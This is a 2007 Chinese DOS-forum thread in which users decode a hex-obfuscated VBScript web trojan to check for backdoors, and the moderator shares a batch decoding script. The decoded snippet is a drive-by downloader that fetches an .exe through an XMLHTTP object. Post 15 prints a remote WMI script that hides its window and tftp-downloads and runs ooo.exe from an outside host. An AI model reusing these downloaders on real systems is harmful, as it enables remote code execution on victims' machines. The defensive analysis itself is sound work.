中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客 注册 登录 会员 网志 搜索 命令提示符 Bash 上传 统计
中国DOS联盟论坛
现在时间是 2026-06-28 13:49
欢迎新会员 114514hhh  RSS
48,003 主题排行 / 350,080 发帖 / 今日 0 篇 / 48,218 会员排行 不转换/ 简体中文/ 繁體中文(台灣)/ 繁體中文(香港)
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » 请问这一段VBScript应该如何解密.. 郁闷啊``(lxmxn。。) 查看 2,516 回复 17
1 2 下一页 › 推荐给朋友 分享到 X 分享到 微博 分享到 Telegram 分享到 QQ空间 复制链接 二维码
楼 主 请问这一段VBScript应该如何解密.. 郁闷啊``(lxmxn。。) 发表于 2007-06-13 02:44 ·  中国 福建 漳州 电信
kkapskok
初级用户
积分 29
发帖 10
注册 2007-06-04 14:55
19年会员
UID 90233
性别 男
状态 离线
<script language="VBScript">
C="0d6f6e206572726f7220726573756d65206e6578740d6375726c3d22687474703A2F2F7777772E62616964752E636F6D2F62616964752E657865220d666e616d65313d2263696b652e657865220d666e616d65323d2263696b652e766273220d536574206466203d20646f63756d656e742e637265617465456c656d656e7428226f626a656374222"
C=C+"90d64662e7365744174747269627574652022636c6173736964222c2022636c7369643a42443936433535362d363541332d313144302d393833412d303043303446433239453336220d7374723d224d6963726f736f66742e584d4c48545450220d5365742078203d2064662e4372656174654f626a656374287374722c2222290d43313d2241646f220d43323d2264622e220d43333d22737472220d43343d"

这到底应该用什么工具来解密啊!! .. 查后门要紧啊!!!:(

[ Last edited by kkapskok on 2007-6-13 at 10:45 PM ]
2 发表于 2007-06-13 03:41 ·  中国 江苏 南京 电信
baomaboy
银牌会员
★★★
积分 1,513
发帖 554
注册 2005-12-30 00:50
20年会员
UID 48180
性别 男
状态 离线
你根本没发完,谁也解不了
好多菩提树,好多明镜台。本来好多物,好多的尘埃。
3 我得到的结果 发表于 2007-06-13 14:54 ·  中国 湖北 武汉 电信
lxmxn
版主
★★★★★
积分 11,386
发帖 4,938
注册 2006-07-23 17:10
19年会员
UID 59080
状态 离线

on error resume next
curl="http://www.baidu.com/baidu.exe"
fname1="cike.exe"
fname2="cike.vbs"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4=


[ Last edited by lxmxn on 2007-6-13 at 04:25 PM ]
4 发表于 2007-06-13 18:59 ·  中国 广东 广州 电信
dikex
高级用户
★★★
潜水修练批处理
积分 788
发帖 366
注册 2006-12-31 02:43
19年会员
UID 75048
性别 男
状态 离线
网马常用的转换为16进制ASCII码;

不过如果加了偏移等,楼主只是发这些数据是不能解开的
正在潜水修练的批处理小白
5 发表于 2007-06-13 22:31 ·  中国 福建 漳州 电信
kkapskok
初级用户
积分 29
发帖 10
注册 2007-06-04 14:55
19年会员
UID 90233
性别 男
状态 离线
厉害的版主 能解开啊。。。 能请问下用什么方法解密的吗`` 我急需去找看看有没有后门。。。。
6 发表于 2007-06-13 22:33 ·  中国 福建 福州 电信
meayjun
初级用户
积分 24
发帖 8
注册 2007-06-13 18:16
19年会员
UID 91219
性别 男
状态 离线
楼猪厉害
7 发表于 2007-06-13 22:34 ·  中国 福建 漳州 电信
kkapskok
初级用户
积分 29
发帖 10
注册 2007-06-04 14:55
19年会员
UID 90233
性别 男
状态 离线
我厉害什么哦。。。。 是板主厉害啊,,, 能请教下 是怎么解密的吗。。 急需去看看有没有后门。。急死。。
8 发表于 2007-06-13 22:45 ·  中国 福建 漳州 电信
kkapskok
初级用户
积分 29
发帖 10
注册 2007-06-04 14:55
19年会员
UID 90233
性别 男
状态 离线
请版主快快进来一下 能请教下 是怎么解密的吗。。。 太急了。。
9 发表于 2007-06-14 00:05 ·  中国 湖北 武汉 电信
lxmxn
版主
★★★★★
积分 11,386
发帖 4,938
注册 2006-07-23 17:10
19年会员
UID 59080
状态 离线
那好,我就把我的脚本发出来吧。

新手学习,高手勿笑。

需要外部工具 sed 、grep。


@echo off&SetLocal EnableDelayedExpansion

cd.>ok.txt

if "%1"=="" (set /p file=Please input the file to be cope with:) else (set file=%1)

for /f %%a in ('grep -o ".." %file%') do (

	set /a asc=0x%%a

	set str=!str!+chr^(!asc!^)

)

set str=""%str%

echo a=%str%:wscript.echo a>__temp.vbs

cscript.exe //nologo __temp.vbs|sed "s/\x0D/\x0d\x0a/g"|more>%~dp1.\ok.txt

del __temp.vbs&start %~dp1.\ok.txt
本帖最近评分记录 (共 1 条) 点击查看详情
评分人分数时间
stornager +3 2007-06-24 15:55
10 发表于 2007-06-14 00:06 ·  中国 湖北 武汉 电信
lxmxn
版主
★★★★★
积分 11,386
发帖 4,938
注册 2006-07-23 17:10
19年会员
UID 59080
状态 离线
%file% 是指的只含有16进制数码的文本。
11 发表于 2007-06-15 01:02 ·  中国 福建 漳州 电信
kkapskok
初级用户
积分 29
发帖 10
注册 2007-06-04 14:55
19年会员
UID 90233
性别 男
状态 离线
谢谢!! 十分感谢版主! 谢谢分享!!
12 发表于 2007-06-15 10:45 ·  中国 上海 浦东新区 电信
lililulula
中级用户
★★
积分 302
发帖 138
注册 2007-03-29 02:33
19年会员
UID 83224
性别 男
状态 离线
好久不来 斑竹功力大增~~~
13 发表于 2007-06-15 11:07 ·  中国 湖北 武汉 电信
lxmxn
版主
★★★★★
积分 11,386
发帖 4,938
注册 2006-07-23 17:10
19年会员
UID 59080
状态 离线
Originally posted by lililulula at 2007-6-15 10:45:
好久不来 斑竹功力大增~~~

兄过奖了,我只会弄简单的,难的就不会了。o_O
14 求各位老大帮我也解密下,先谢谢你们了 发表于 2007-06-24 08:56 ·  中国 江苏 淮安 电信
hazjs
初级用户
积分 60
发帖 25
注册 2007-06-24 08:29
19年会员
UID 92213
性别 男
状态 离线
谢谢老大帮我解密了

[ Last edited by hazjs on 2007-6-25 at 07:18 AM ]
15 发表于 2007-06-24 10:11 ·  中国 陕西 西安 电信
slore
铂金会员
★★★★
积分 5,212
发帖 2,478
注册 2007-02-08 23:39
19年会员
UID 79003
性别 男
状态 离线
Const HIDDEN_WINDOW = 12
strComputer = wscript.arguments(0)
strUserName = wscript.arguments(1)
strPassWord = wscript.arguments(2)
Set objSWbemLocator = CreateObject("wbemscripting.swbemlocator")
Set objSWbemServices = objSWbemLocator.ConnectServer(strComputer,"root\cimv2",strUserName,strPassWord)
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
bat = objSWbemObject.Create("cmd.exe /c echo tftp -i 676757.vicp.net get ooo.exe>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c echo ping -n 20 127.1>>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c echo ooo.exe>>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c ftp.bat", Null, objConfig, intProcessID)
本帖最近评分记录 (共 1 条) 点击查看详情
评分人分数时间
stornager +3 2007-06-24 15:57
1 2 下一页 ›
可打印版本 | 订阅主题 | 收藏主题
论坛跳转:
[ 联系联盟系统管理团队 - 中国DOS联盟 ]

Sponsored by ifanr Inc | © 2001–2023